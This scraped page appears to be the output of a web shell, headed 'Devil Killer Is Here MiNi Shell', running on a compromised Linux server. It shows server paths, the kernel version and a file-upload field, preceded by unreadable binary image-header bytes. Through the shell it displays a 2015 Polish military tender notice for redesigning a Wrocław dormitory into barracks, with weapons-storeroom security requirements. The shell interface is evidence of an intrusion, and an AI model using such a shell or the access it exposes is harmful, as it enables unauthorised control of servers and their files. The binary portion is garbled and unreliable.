JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150212/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150212/19393-N-2015.html

<p class="kh_header"><b>Wrocław: OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ 
NA PRZEBUDOWĘ BUDYNKU INTERNATOWEGO NA INTERNATOWO
- KOSZAROWY NR 9/2836 W CENTRUM SZKOLENIA WOJSK INŻYNIERYJNYCH I CHEMICZNYCH WE WROCŁAWIU WRAZ Z UZYSKANIEM DECYZJI O USTALENIU LOKALIZACJI INWESTYCJI CELU PUBLICZNEGO ORAZ DECYZJI ZATWIERDZAJĄCEJ PROJEKT BUDOWANY I WYDANIE POZWOLENIA NA BUDOWĘ, Z PÓŹNIEJSZYM PEŁNIENIEM NADZORU AUTORSKIEGO I PRZENIESIENIEM AUTORSKICH PRAW MAJĄTKOWYCH - ZADANIE 21261

Realizacja zadania wiąże się z dostępem do informacji niejawnych o klauzuli ZASTRZEŻONE</b><br>
<b>Numer ogłoszenia: 19393 - 2015; data zamieszczenia: 12.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 71 765 68 40, faks 71 765 68 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rziwroclaw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ 
NA PRZEBUDOWĘ BUDYNKU INTERNATOWEGO NA INTERNATOWO
- KOSZAROWY NR 9/2836 W CENTRUM SZKOLENIA WOJSK INŻYNIERYJNYCH I CHEMICZNYCH WE WROCŁAWIU WRAZ Z UZYSKANIEM DECYZJI O USTALENIU LOKALIZACJI INWESTYCJI CELU PUBLICZNEGO ORAZ DECYZJI ZATWIERDZAJĄCEJ PROJEKT BUDOWANY I WYDANIE POZWOLENIA NA BUDOWĘ, Z PÓŹNIEJSZYM PEŁNIENIEM NADZORU AUTORSKIEGO I PRZENIESIENIEM AUTORSKICH PRAW MAJĄTKOWYCH - ZADANIE 21261

Realizacja zadania wiąże się z dostępem do informacji niejawnych o klauzuli ZASTRZEŻONE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na przebudowę budynku internatowego na koszarowy ze zmianą sposobu użytkowania - budynek nr 9/2836 w Centrum Szkolenia Wojsk Inżynieryjnych i Chemicznych we Wrocławiu, spełniającej wymogi stawiane w art. 29 i 30 ustawy Prawo zamówień publicznych, która stanowić będzie opis przedmiotu zamówienia na roboty budowlane w myśl art. 31 ustawy Pzp dla realizacji rzeczowej  przebudowy budynku internatowego na koszarowy nr 9/2836 w Centrum Szkolenia Wojsk Inżynieryjnych i Chemicznych we Wrocławiu. Przedmiotem zamówienia jest również uzyskanie w Dolnośląskim Urzędzie Wojewódzkim we Wrocławiu decyzji o ustaleniu lokalizacji inwestycji celu publicznego oraz decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenie na budowę wraz z późniejszym pełnieniem nadzoru autorskiego w zakresie objętym wykonywaną dokumentacją projektową i przeniesieniem autorskich praw majątkowych ­ zadanie 21261. Projektanci instalacji niskoprądowych powinni posiadać poświadczenie bezpieczeństwa osobowego o klauzuli Zastrzeżone lub posiadać stosowne upoważnienie kierownika biura projektowego zgodnie z przepisami ochrony informacji niejawnych.  
Osoby mające wgląd do dokumentacji niejawnej będącej w posiadaniu RZI powinny posiadać poświadczenie bezpieczeństwa osobowego o klauzuli Zastrzeżone lub posiadać stosowne upoważnienie kierownika biura projektowego zgodnie z przepisami ochrony informacji niejawnych.  
Wykonana dokumentacja projektowa winna zawierać wszystkie elementy niezbędne do prawidłowego, zgodnego z prawem i wymaganiami Zamawiającego dla osiągnięcia efektu rzeczowego tj. przebudowy budynku internatowego na koszarowy. Dokumentacja obejmować będzie wszystkie niezbędne roboty budowlane w stopniu szczegółowości pozwalającym na jednoznaczne ich zdefiniowanie.
Istniejący budynek nr 9 wymaga dostosowania do aktualnie obowiązujących przepisów pod względem funkcjonalnym, termicznym i bezpieczeństwa ze szczególnym uwzględnieniem standardów niskoenergetycznych poszczególnych przegród.
W ramach projektowanej przebudowy należy przewidzieć następujące pomieszczenia na poszczególnych kondygnacjach:

1/  PARTER  :
a/ izby  żołnierskie  3-4 osobowe  -  szt.15  ,  ( alternatywnie  :  pom. biurowe )
b/ pomieszczenia  biurowe - kancelaryjne ze stanowiskami pracy dla kadry - szt.4
c/ magazyn broni  ( zgodnie z Instrukcją o ochronie obiektów OIN 5/2011) .
d/ pomieszczenie  dla służby dyżurnej ( z dyżurem całodobowym ) na parterze 
e/ pralnię  i  suszarnię  
g/ pomieszczenie gospodarcze
h/ pomieszczenie kuchenne z jadalnią  dla  pododdziału na 12  osób
i/  zespoły  pomieszczeń  higieniczno - sanitarnych  ( damskie  i   męskie )
 2/  1  PIĘTRO  :
a/ sale  żołnierskie  3-4 osobowe   -  szt. 12
b/ pomieszczenia  biurowe - kancelaryjne  - szt.1
c/ SPN  Służbowe Pokoje  Noclegowe  -  szt.3 + 1 .
d/ pomieszczenie  odpoczynku służby dyżurnej  - szt.1
e/ pralnię  i  suszarnię  dla   pododdziału  
g/ pomieszczenie gospodarcze
h/ pomieszczenie kuchenne  z jadalnią  dla  pododdziału na 12  osób
i/  zespoły  pomieszczeń  higieniczno - sanitarnych  ( damskie  i   męskie ) 
3/   2  PIĘTRO :
a/ sale  żołnierskie  3-4 osobowe  -  szt.15
b/ pomieszczenia  biurowe - kancelaryjne ze stanowiskami pracy dla kadry -szt.4
c/ magazyn broni  ( zgodnie z Instrukcją o ochronie obiektów OIN 5/2011).
d/ pomieszczenie  dla  służby dyżurnej  
e/ pralnię  i  suszarnię  dla  pododdziału  
g/ pomieszczenie gospodarcze
h/ pomieszczenie kuchenne  z jadalnią  dla  pododdziału na 12  osób
i/  zespoły  pomieszczeń  higieniczno - sanitarnych  ( damskie  i   męskie ) 
4/   PODDASZE  UŻYTKOWE   :
j/  szatnie - dla każdego pododdziału
l/  pokoje instruktorów -dla każdego pododdziału
ł/  sale   metodyczne
m/ sala  odpraw z wyposażeniem audiowizualnym i komputerowym
n/  1 pomieszczenie gospodarcze
o/  pomieszczenia sanitarne /wc/:   -1 damskie  ;   -1 męskie 
p/  pomieszczenia czyszczenia broni 
5/   PIWNICE  :   
a/ serwerownia ,
b/ węzeł  cieplny dla potrzeb bud. nr 9  i  oddzielny z przygotowanymi króćcami  C.O. dla bud. nr 52, 
d/ pomieszczenia  szatni dla  ustawienia  Szaf   WP2 - 40 x ,
e/ magazyny  / pom. gospodarcze , magazyny / pomieszczenia ukrycia dla całego stanu osobowego.
W opracowaniu należy uwzględnić wszystkie roboty wymienione w MWWO-U oraz  zaplanowany zakres prac opisany w zatwierdzonym Programie Inwestycji  i Inwentaryzacji do celów poprojektowych dla przedmiotowego zadnia inwestycyjnego, w tym między innymi:
a)	wymianę pokrycia dachu wraz z wymianą obróbek blacharskich, rynien i rur spustowych,
b)	wykonanie napraw ścian budynku wraz z elewacją,
c)	termomodernizację całego obiektu wraz z dociepleniem stropu nad poddaszem użytkowym, 
d)	przebudowę funkcji pomieszczeń, w tym wykonanie dwóch magazynów broni zgodnie z Instrukcją o ochronie obiektów sygnatura OIN 5/2011 (o powierzchni nie mniejszej niż 20 m2), 
e)	zamontowanie odbojnic na ciągach komunikacyjnych poziomych w budynku,
f)	wykonanie wszystkich niezbędnych robót wynikających z opracowanej ekspertyzy technicznej i audytu energetycznego,
g)	wykonanie wentylacji grawitacyjnej i mechanicznej w zależności od potrzeb            i zgodnie z obowiązującymi w tym zakresie przepisami,
h)	wykonanie izolacja cieplnej i przeciwwilgociowej ścian fundamentowych z ewentualnym drenażem opaskowym,
i)	przebudowę wjazdu na kondygnację piwniczną od strony szczytu lewego,
j)	uwzględnienie w opracowaniach projektowych potrzeby zabezpieczenia w media  budynku nr 9 i 52 ( z funkcją basenu) wprowadzanych  do budynku nr 9,
k)	niezbędne cięcia sanitarne drzew lub wycinki drzew, krzewów.
Ponadto w ramach przygotowania  przebudowy budynku ze zmianą przeznaczenia  niezbędnym będzie:
-	dostosowanie budynku do wymogów użytkownika określonych w minimalnych wojskowych wymaganiach organizacyjno-użytkowych zadania inwestycyjnego, z uwzględnieniem aktualnego stanu technicznego budynku oraz warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie.
Wymagane parametry i dane:
-	wentylacja grawitacyjna czy mechaniczna z rekuperacją ciepła -  obsługa doraźna, 
-	wymogi wilgotnościowe i temperaturowe obowiązujące jak dla budynków internatowych i koszarowych  ogrzewanych,
-	okna z PCV, drzwi zewnętrzne, ściany i pozostałe przegrody budowlane zaprojektować z zachowaniem aktualnych przepisów o współczynnikach ciepła u, zachowując dotychczasową kompozycje kolor i sposób osadzenia,
-drzwi wejściowe do pomieszczeń i magazynów broni powinny być klasy odporności min.3 lub stalowe z blachy o grubości co najmniej 5mm oraz wyposażone w dwa certyfikowane wewnętrzne zamki klasy C, dodatkowo zabezpieczone kłódką co najmniej klasy 5 i odporności na korozję klasy 3, z możliwością odstępstwa od zabezpieczenia kłódką w przypadku zastosowania drzwi certyfikowanych klasy ochrony 3.
-drzwi wejściowe do magazynu broni powinny posiadać  zabezpieczenie przeciwwyważeniowe.
- w magazynach broni  zastosować okna i drzwi o zwiększonej odporności na włamanie min. klasy 3  wg PN-ENV1627
- kraty w oknach wg § §82,83,86.1 Instrukcji o ochronie obiektów,
- w ścianach i sufitach pomieszczeń chronionych otwory wentylacyjne należy zabezpieczać kratą o parametrach wyżej wymienionych dla otworów o wym. 200x300mm, a dla pozostałych otworów- siatką 25x25mm z pręta fi 1,5mm. 
- zaopatrzenie obiektu w urządzenia i wyposażenie gospodarcze w węzłach 
 sanitarnych,
- oznakowanie obiektu zgodnie z przepisami p. poż. i ewakuacyjnymi, zgodnie z PN-92/N-01256/02 i PN-92/N-01256/01,
-  instalacja odgromowa - zgodnie z PN-89/E/05003.03..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6, 71.22.10.00-3, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium 
w wysokości 3.500,00 zł.
2. Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego 
do dnia 03.03.2015 r. do godz. 10.00. Nie dopuszcza się wnoszenia wadium 
w formie gotówki do kasy Zamawiającego.
3. Wadium wniesione w postaci poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji bankowych, gwarancji ubezpieczeniowych oraz poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.) musi zawierać co najmniej:
1)	nazwę i adres Wykonawcy, 
2)	nazwę i adres beneficjenta, 
3)	nazwę i adres gwaranta/ poręczyciela,
4)	nazwa zadania, na które składane jest wadium,
5)	kwotę,
6)	termin ważności,
7)	wskazanie wszystkich przypadków powodujących utratę wadium zgodnie 
z art. art. 46 ust. 4a i  ust. 5 ustawy Pzp.
Wadium, o którym mowa w pkt 3.6.3 musi zostać złożone w kasie Zamawiającego (bud. RZI, pok. 20) w terminie do dnia - 03.03.2015 r. do godz. 10.00. 
W przypadku, gdy Wykonawca nie wniesie wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa 
w art. 46 ust. 3 ustawy Pzp, albo nie zgodził się na przedłużenie okresu związania 
ofertą, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt. 2.
4. W przypadku wnoszenia wadium w pieniądzu należy je wpłacić na konto 
NBP o/Okr we Wrocławiu 78 1010 1674 0030 7213 9120 1000, z dopiskiem: wadium dotyczące przetargu nieograniczonego na opracowanie dokumentacji projektowej na przebudowę budynku internatowego na internatowo-koszarowy 
nr 9/2836 w Centrum Szkolenia Wojsk Inżynieryjnych i Chemicznych 
we Wrocławiu - zadanie 21261.
5. Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, 
z zastrzeżeniem pkt 3.6.7. SIWZ.
6. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 
ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, 
o której mowa w art. 24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.
11. Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie Wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.
12. Wadium wybranego Wykonawcy zostanie zwrócone niezwłocznie po wniesieniu wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi podsiadać aktualną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego zgodnie z Ustawą z dnia 22 sierpnia 1997 r. (Dz. U 114 poz. 740 z późniejszymi zmianami) oraz Instrukcją OIN 5/2011 o Ochronie Obiektów Wojskowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał co najmniej jedno opracowanie dokumentacji projektowej na budowę/przebudowę/remont budynku o kubaturze nie mniejszej niż 8.000 m3 oraz wykazać się doświadczeniem dotyczącym minimum jednej realizacji dokumentacji projektowej budowy, rozbudowy systemów alarmowych tj. Systemów Sygnalizacji Włamania i Napadu (SSWiN), Alarmu Pożaru (SAP). Na potwierdzenie ww. warunku należy załączyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane Formularz nr 3 (oryginał podpisany przez Wykonawcę), oraz załączeniem dowodów czy zostały wykonane lub 
są wykonywane należycie (oryginał lub kopia dokumentu poświadczona 
za zgodność z oryginałem przez Wykonawcę).
Za główną usługę Zamawiający uznaje usługę wskazaną w pkt 1.5.1 SIWZ.
Dowodem, o którym mowa powyżej jest poświadczenie, z tym, że w odniesieniu 
do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 
Wykonawca, w miejsce w/w poświadczeń, może przedkładać dokumenty potwierdzające należyte wykonanie roboty budowlanej, określone w § 1 ust. 1 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r. poz. 231).
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest 
w stanie uzyskać w/w poświadczenia, do oferty należy załączyć oświadczenie Wykonawcy wraz z uzasadnieniem przyczyn, o których mowa wyżej.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 9). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział 
w postępowaniu (np. jako podwykonawca, doradca, konsultant).

Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa 
w art. 22 ust. 1 pkt 2 Ustawy będzie polegał na wiedzy i doświadczeniu innych podmiotów na zasadach, określonych w art. 26 ust. 2b Ustawy, podmioty 
te są zobowiązane załączyć dokument, o którym mowa w pkt 1.1 ppkt 1.1.3 A</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o realizacje przedsięwzięć ochronnych w obiektach wojskowych, których realizacja wiąże się z dostępem do informacji niejawnych         o klauzuli ZASTRZEŻONE musi wykazać, że dysponuje odpowiednim potencjałem technicznym tj. akredytowanym systemem teleinformatycznym przeznaczonym do przetwarzania informacji niejawnych o klauzuli ZASTRZEŻONE, któremu akredytacji  udzielił kierownik jednostki organizacyjnej. W celu wykazania spełnienia ww. warunku, Wykonawca załączy 
do oferty stosowne oświadczenie. Na potwierdzenie ww. warunku Wykonawca załączy wykaz urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia tj. akredytowany systemem teleinformatyczny przeznaczony 
do przetwarzania informacji niejawnej o klauzuli ZASTRZEŻONE, któremu akredytacji udzielił kierownik jednostki organizacyjnej - Formularz Nr 8. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
W takiej sytuacji zobowiązany jest on udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania 
mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (wzór - Formularz Nr 9). 
Podmiot, który zobowiązał się do udostępnienia zasobów odpowiada solidarnie 
z Wykonawcą za szkodę Zamawiającego powstała wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
Zobowiązanie musi przybrać formę pisemną i nie jest dopuszczalna inna forma, 
w tym kopia dokumentu potwierdzona za zgodność z oryginałem. 
W oświadczeniu podmiotu o udostępnieniu potencjału oraz wiedzy i doświadczenia należy wskazać, w jakim charakterze podmiot trzeci będzie brał udział 
w postępowaniu (np. jako podwykonawca, doradca, konsultant).

Jeżeli Wykonawca wykazując spełnienie warunku, o którym mowa 
w art. 22 ust. 1 pkt 2 Ustawy będzie polegał na wiedzy i doświadczeniu innych podmiotów na zasadach, określonych w art. 26 ust. 2b Ustawy, podmioty 
te są zobowiązane załączyć dokument, o którym mowa w pkt 1.1 ppkt 1.1.3 SIWZ A.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje projektantami przewidzianymi 
do realizacji:
1)	projektantem - ze specjalnością konstrukcyjno - budowlaną - bez ograniczeń. Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
2)	projektantem branży elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń. 
Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (Ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego 
do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.
3)	projektantem branży instalacyjnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - bez ograniczeń.
